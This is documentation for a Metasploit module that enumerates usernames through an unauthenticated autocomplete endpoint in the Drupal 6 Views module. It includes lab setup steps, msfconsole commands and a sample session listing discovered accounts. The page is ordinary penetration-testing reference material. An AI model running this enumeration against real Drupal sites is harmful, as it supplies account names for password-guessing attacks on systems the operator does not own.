Adithyadspawar
1.8 KiB
1.8 KiB
Vulnerable Application
This module exploits an information disclosure vulnerability in the
Views module for Drupal 6. When the Views module
version 6.x-2.11 or earlier is installed, the autocomplete callback for user fields is
accessible without proper authorization. The module brute-forces the first 10 usernames by
iterating through the letters a to z.
Drupal does not consider disclosure of usernames to be a security weakness on its own, but enumerated usernames can be useful for password-guessing attacks.
Setup
- Install Drupal 6 with the Views module version 6.x-2.11 or earlier.
- Create several user accounts so there is data to enumerate.
- Ensure the Views module is enabled under Administer > Site building > Modules.
Verification Steps
- Start msfconsole
- Do:
use auxiliary/scanner/http/drupal_views_user_enum - Do:
set RHOSTS [target IP] - Do:
run - You should see a list of discovered usernames printed to the console.
Options
TARGETURI
The base path to the Drupal installation. The default value is /. Change this if Drupal is
installed in a subdirectory, for example /drupal/.
Scenarios
Drupal 6.x with Views 6.x-2.11
msf > use auxiliary/scanner/http/drupal_views_user_enum
msf auxiliary(scanner/http/drupal_views_user_enum) > set RHOSTS 192.168.1.50
RHOSTS => 192.168.1.50
msf auxiliary(scanner/http/drupal_views_user_enum) > set TARGETURI /
TARGETURI => /
msf auxiliary(scanner/http/drupal_views_user_enum) > run
[*] Begin enumerating users at 192.168.1.50
[+] Found User: admin
[+] Found User: john
[+] Found User: testuser
[*] Done. 3 usernames found...
[*] Usernames stored in: /root/.msf4/loot/20250319120000_default_192.168.1.50_drupal_user_123456.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed